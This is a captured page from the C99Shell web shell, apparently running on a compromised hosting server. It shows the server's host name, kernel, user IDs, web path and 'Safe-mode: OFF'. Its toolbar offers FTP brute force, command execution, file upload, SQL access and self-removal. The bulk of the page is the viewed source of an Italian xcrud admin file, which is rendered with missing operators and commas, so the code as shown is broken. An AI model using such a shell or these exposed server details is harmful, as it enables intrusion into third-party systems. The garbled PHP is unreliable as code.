!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/aps/gestionale/pages/   drwxr-xr-x
Free 182.72 GB of 490.84 GB (37.23%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     _durata.php (3.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $xcrud 
Xcrud::get_instance();
    
$xcrud->table('durata');
    
$xcrud->table_name(' ');
    
$table 'durata';



    
//$xcrud->relation('area_medica','aree_mediche','id','area');
    
    
$xcrud->button('#'"Sali"'glyphicon glyphicon-arrow-up icon-arrow-up''btn xcrud-action', array(
        
'data-action' => 'movetop',
        
'data-task' => 'action',
        
'data-table' => ''.$table.'',
        
'data-primary' => '{id}'));
    
$xcrud->button('#'"Scendi"'glyphicon glyphicon-arrow-down icon-arrow-down''btn xcrud-action', array(
        
'data-action' => 'movebottom',
        
'data-task' => 'action',
        
'data-table' => ''.$table.'',
        
'data-primary' => '{id}'));
        
    
$xcrud->create_action('movetop''movetop');
    
$xcrud->create_action('movebottom''movebottom');
    
    
$xcrud->create_action('publish''publish_action'); // action callback, function publish_action() in functions.php
    
$xcrud->create_action('unpublish''unpublish_action');
    
$xcrud->button('#''unpublished''icon-close glyphicon glyphicon-remove''xcrud-action',
        array(  
// set action vars to the button
            
'data-task' => 'action',
            
'data-action' => 'publish',
            
'data-table' => ''.$table.'',
            
'data-primary' => '{id}'),
        array(  
// set condition ( when button must be shown)
            
'pubblicato',
            
'!=',
            
'1')
    );
    
$xcrud->button('#''published''icon-checkmark glyphicon glyphicon-ok''xcrud-action', array(
        
'data-task' => 'action',
        
'data-action' => 'unpublish',
        
'data-table' => ''.$table.'',
        
'data-primary' => '{id}'), array(
        
'pubblicato',
        
'=',
        
'1'));
    
    
    
//$xcrud->unset_sortable();
    
$xcrud->order_by('ordinamento');
    
$xcrud->modal('testo');
    
$xcrud->column_width('pubblicato,testo','70px'); 
    
$xcrud->highlight_row('pubblicato''='0'#FFA299');
    
//$xcrud->validation_required('titolo_veicolo')->validation_required('id_categoria')->validation_required('data_pubblicazione_inizio');
    
$xcrud->fields('titolo, testo, pubblicato'false'durata');

    
$xcrud->change_type('pubblicato''select''1', array('1'=>'Yes','0'=>'No'));
    
     
    
//echo $xcrud->render('create');
    
    //$xcrud->relation('id_categoria','categorie','id','titolo_categoria','','','',' ','','id_categoria_madre','direttiva_euro');
    //$xcrud->relation('id_tipologia','tipologie','id','titolo_tipologia');
    //$xcrud->relation('id_categoria','categorie','id','titolo_categoria','','','','','','id_tipologia','id_tipologia');
    //$xcrud->relation('city','meta_location','id','local_name','type = \'CI\'','','','','','in_location','region');
    
     //relation ( field, target_table, target_id, target_name, where_array, order_by, multi, concat_separator, tree, depend_field, depend_on )
    /*                        
    $xcrud->fields('thumb_2,immagine_2,didascalia_2', false, 'Immagine 2');
    $xcrud->change_type('thumb_2', 'image', '', array('width' => 200, 'height' => 300, 'manual_crop' => true));
    $xcrud->change_type('immagine_2', 'image', '', array('width' => 900, 'height' => 900));
    
    $xcrud->fields('thumb_3,immagine_3,didascalia_3', false, 'Immagine 3');
    $xcrud->change_type('thumb_3', 'image', '', array('width' => 200, 'height' => 300, 'manual_crop' => true));
    $xcrud->change_type('immagine_3', 'image', '', array('width' => 900, 'height' => 900));
    */
    //$xcrud->fields('allegato_pdf', false, 'Allegato');
    //$xcrud->change_type('allegato_pdf', 'file');
    
$xcrud->columns('titolo,testo,pubblicato');
    
$xcrud->hide_button('view');
    
$xcrud->unset_csv();
    
    echo 
$xcrud->render();
    
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0106 ]--